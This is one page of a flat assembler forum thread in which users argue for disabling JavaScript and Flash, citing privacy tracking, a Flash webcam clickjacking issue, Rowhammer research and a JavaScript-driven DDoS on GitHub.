flat assembler
Message board for the users of flat assembler.
 Home   FAQ   Search   Register 
 Profile   Log in to check your private messages   Log in 
flat assembler > Heap > Why we should always disable JS (and flash)

Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8, 9  Next
Author
Thread Post new topic Reply to topic
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Soon, we are going to have wireless electricity. Rolling Eyes

That'll give hackers something to do.


Last edited by typedef on 31 Jul 2011, 19:56; edited 1 time in total
Post 31 Jul 2011, 14:55
View user's profile Send private message Reply with quote
Tyler



Joined: 19 Nov 2009
Posts: 1216
Location: NC, USA

typedef wrote:
And how to get rid of them :

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager03.html

Uncheck Allow 3rd party Flash content to store data on your PC

If the settings can be changed through Flash itself, doesn't that imply there is a vulnerability somewhere that would allow someone to change that, and any other setting, to what ever they want? Note: the settings manager at that link is a Flash app.
Post 31 Jul 2011, 17:31
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
whatever the fuck they achieve in doing that.

anyways: debt ceiling cat is watching you default. lol
Post 31 Jul 2011, 19:55
View user's profile Send private message Reply with quote
YONG



Joined: 16 Mar 2005
Posts: 8000
Location: 22° 15' N | 114° 10' E

MHajduk wrote:
Technologies and tools evolve over time but the purpose ("to entertain people") stays the same since the dawn of history. Wink

Well said. I strongly believe that someone will be quoting this statement in his or her PhD thesis in the near future. Razz Wink
Post 01 Aug 2011, 06:07
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries

vid wrote:
Oh yeah, "visual arts" and "media" are how the big brother bribes us into giving up our privacy Very Happy

Yes indeed. Now the game companies want to track you also. Not with JS though, but it is partially related to this thread. Look at this:

Diablo 3 Requires Always-On Internet Connection
Post 01 Aug 2011, 14:46
View user's profile Send private message Visit poster's website Reply with quote
DOS386



Joined: 08 Dec 2006
Posts: 1904
> Why we should always disable JS (and flash)

Because JS and even much more Flash are just redundant and evil Evil or Very Mad You can get almost everything working well without them, except, of course, you deliberately want to break compatibility or put your visitors into security and privacy risks.
Post 02 Aug 2011, 13:22
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
my website host appends a script which stores google analytics cookies on "your" computer
Post 02 Aug 2011, 17:15
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Chilling stuff:

Adobe plugs Flash webcam spy hole wrote:
In announcing the fix, Adobe said it was aware of a report describing a clickjacking issue related to the Flash Player Settings Manager. “We have resolved the issue with a change to the Flash Player Settings Manager SWF file hosted on the Adobe website. No user action or Flash Player product update are required." No user action or update required? That comforter is what rattles Steven Bellovin, Professor of Computer Science at Columbia University.

"Code on a remote computer somewhere decides whether or not random web sites can spy on you," he blogged in CircleID. "it's simply wrong for a design to outsource a critical access control decision to a third party. My computer should decide what sites can turn on my camera and microphone, not one of Adobe's servers."

Emphasis is mine.
Post 22 Oct 2011, 16:17
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Well, as if there weren't already enough reasons, here is another:

Detect if visitors are logged into Twitter, Facebook or Google+

And, as usual, all of this fails when JS is disabled.

A random website has no business knowing which other sites I use or log in to.

Remember to always forge your referer also, but everyone already does this, right?
Post 01 Mar 2012, 13:12
View user's profile Send private message Visit poster's website Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Let's make a filter library that'll filter out all those stuff. Kind of like Ad-Block but only external to the browser.
Post 02 Mar 2012, 05:45
View user's profile Send private message Reply with quote
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Is that a quote?
Post 02 Mar 2012, 20:13
View user's profile Send private message Reply with quote
edfed



Joined: 20 Feb 2006
Posts: 4157
Location: achtétépéhèseu://pasteubineu.comeu/Vw7WXXf4
done.
Post 02 Mar 2012, 21:02
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Yet another reason why remote websites should never be permitted to run arbitrary code on a local machine.

http://googleprojectzero.blogspot.co.at/

Quote:
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process. When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.

[...]

... a serious problem, because it might be possible to generate bit flips from JavaScript code on the open web, perhaps via JavaScript typed arrays.

Post 10 Mar 2015, 01:21
View user's profile Send private message Visit poster's website Reply with quote
redsock



Joined: 09 Oct 2009
Posts: 265
Location: Australia
WOW, this is heavy duty stuff. Testing all of my gear has resulted in all-clear so far, but the implications of things like this and others are severe and far-reaching. Thx for the headsup.
Post 10 Mar 2015, 03:12
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
I was bothered by their seemingly naive notion that this could work on machines with ECC memory. However the rest of the article appears to be much better quality so I am prepared to let that one pass as a silly oversight.
Post 10 Mar 2015, 03:49
View user's profile Send private message Visit poster's website Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1171
Location: Unknown

Quote:

anyway, I think Flash will be gradually superseded by HTML 5


This was said in 2011. Flash is almost extinct nowadays.

I do not have flash in my browser anymore and only a few places complain I do not have flash installed, most are just ads.

Now about disabling JS, it is hard because many websites don't work at all without JS. The reason I have it enabled.

The maximum I can do is to allow a few sites to run JS script on web pages...
Post 11 Mar 2015, 19:22
View user's profile Send private message Reply with quote
badc0de02



Joined: 25 Nov 2013
Posts: 211
Location: %x

typedef wrote:
Soon, we are going to have wireless electricity. Rolling Eyes

That'll give hackers something to do.


what if i get electrocuted if i stubble over a wireless cable because you not See them this would be not secure. or get cancer in the breasts because there is to much technology.
Post 11 Mar 2015, 21:12
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
It is easy to unwittingly become part of a DDoS attack with your JS enabled.

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

We have no easy way to audit JS code that arrives at our browsers. It can be a huge mess of obfuscated text that could take weeks to decode and analyse. And we can never know who is really generating the code within the webpage.
Post 04 Apr 2015, 15:15
View user's profile Send private message Visit poster's website Reply with quote
ManOfSteel



Joined: 02 Feb 2005
Posts: 1135
I almost never have JavaScript enabled. That includes when I'm on GitHub.

I only enable it when the website doesn't work at all/doesn't display any of its contents.
Post 04 Apr 2015, 16:09
View user's profile Send private message Reply with quote
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1171
Location: Unknown
But they say disabling Java Script is not recommended:

    • Allow all sites to run JavaScript (recommended)
    • Do not allow any site to run JavaScript

Now here comes the question: If they recommend it isn't because it is safe to have it enabled!?

I'm asking that because those words come from security enthusiasts...
Post 04 Apr 2015, 16:22
View user's profile Send private message Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2, 3, 4, 5, 6, 7, 8, 9  Next

< Last Thread | Next Thread >

Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2005 phpBB Group.

Main index   Download   Documentation   Examples   Message board
Copyright © 2004-2016, Tomasz Grysztar.